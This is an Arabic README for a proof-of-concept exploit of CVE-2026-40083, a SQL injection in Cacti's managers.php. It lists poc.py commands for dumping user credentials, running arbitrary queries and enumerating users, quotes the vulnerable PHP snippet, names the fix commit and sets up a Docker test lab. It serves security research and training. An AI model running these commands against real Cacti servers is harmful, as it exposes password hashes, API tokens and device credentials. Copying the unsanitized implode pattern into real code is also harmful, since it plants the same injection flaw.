
استغلال إثبات المفهوم لـ CVE-2026-40083، وهو حقن SQL في Cacti managers.php يسمح للمستخدمين المصادق عليهم باستخراج قواعد بيانات MySQL وبيانات اعتماد المستخدم وتجزئات كلمات المرور. يتضمن مختبر Docker للاختبار.
استغلال برهان المفهوم لـ CVE-2026-40083، ثغرة حقن SQL في managers.php الخاصة بـ Cacti تسمح لأي مستخدم مصدق لديه صلاحيات مدير SNMP بقراءة قاعدة بيانات MySQL بأكملها بما في ذلك بيانات اعتماد المستخدم وتجزئات كلمات المرور.
الاستخدام:
# Verify injection (time-based)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin
# Dump specific user credentials
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --target-id 1
# Extract arbitrary SQL query result
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --query "SELECT version()"
# Enumerate all users (scan IDs 1-50)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --max-id 50
# With Burp proxy
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --proxy http://127.0.0.1:8080
في managers.php، يتم إلغاء تسلسل إدخال المستخدم من selected_graphs_array عبر cacti_unserialize() ويتم دمجه مباشرة في SQL دون تعقيم:
$selected_items = cacti_unserialize(stripslashes(gnrv('selected_graphs_array')));
if ($selected_items != false) {
// No validation - direct implode into SQL
db_execute('DELETE FROM snmpagent_managers WHERE id IN (' . implode(',', $selected_items) . ')');
}
يقبل معامل selected_graphs_array مصفوفة PHP متسلسلة. يتم دمج عناصر المصفوفة بفواصل وحقنها مباشرة في جملة IN.
POST /managers.php (action=actions, drp_action=1|2|3)
تسمح ثغرة حقن SQL للمستخدمين المصادقين الذين لديهم صلاحيات مدير SNMP بتنفيذ استعلامات عشوائية على قاعدة البيانات. وهذا يتيح قراءة الجداول التي تحتوي على بيانات المستخدم والإعدادات وبيانات اعتماد الجهاز ومجتمعات SNMP، بالإضافة إلى استخراج تجزئات bcrypt ورموز API، مما قد يؤدي إلى اختراق الحسابات. بالإضافة إلى ذلك، يسمح الخلل بتنفيذ أوامر تأخير زمني، مما قد يتسبب في رفض الخدمة عن طريق استنفاد اتصالات قاعدة البيانات المتزامنة.
7.2 High CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
يضيف الالتزام 52032e760 array_map('intval', $selected_items) قبل الدمج لتحويل جميع القيم إلى أعداد صحيحة.
docker-compose up -d --build
انتظر حوالي 30 ثانية للتهيئة. قم بالوصول إلى Cacti على http://localhost:8088
بيانات الاعتماد الافتراضية: admin / admin
# Test exploit
python3 exploit/poc.py --url http://localhost:8088 --user admin --password admin --target-id 1
هذه الأداة مخصصة للأغراض التعليمية والبحثية فقط. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن أي سوء استخدام أو ضرر ناتج عن هذا البرنامج.
QuimeraX Intelligence هي منصة متقدمة لإدارة السطح الهجومي (EASM) واستخبارات التهديدات السيبرانية متخصصة في تحديد الثغرات الحرجة في الأنظمة المعقدة. تقوم المنصة بمراقبة وكشف وتنبيه العملاء حول تهديدات الأمان بشكل استباقي، مما يضمن الشفافية والاستجابة السريعة للمخاطر المحتملة. يتلقى العملاء إشعارات فورية وتقارير شاملة إذا تم العثور على أنظمتهم معرضة للخطر، مما يمكنهم من اتخاذ إجراءات وقائية. تعرف على المزيد
Hakai Security هي شركة أمن سيبراني أسسها محترفون في مجال الأمن، ملتزمة بالتميز التقني. نقدم حلول أمنية مخصصة تشمل اختبار الاختراق المتقدم، ومحاكاة الفريق الأحمر الواقعية، وممارسات التطوير الآمن لحماية أصول عملائنا بشكل استباقي من التهديدات السيبرانية المتطورة.
Hacking Club هي منصة تدريب حيث تتعلم الأمن السيبراني من خلال دروس عملية ومختبرات وتحديات أنشأها خبراء يعملون في شركتنا الاستشارية الأمنية: مباشرة من ساحة المعركة إلى تدريبك. تدرب على الثغرة المعروضة في هذا المستودع من خلال hacking club! تعرف على المزيد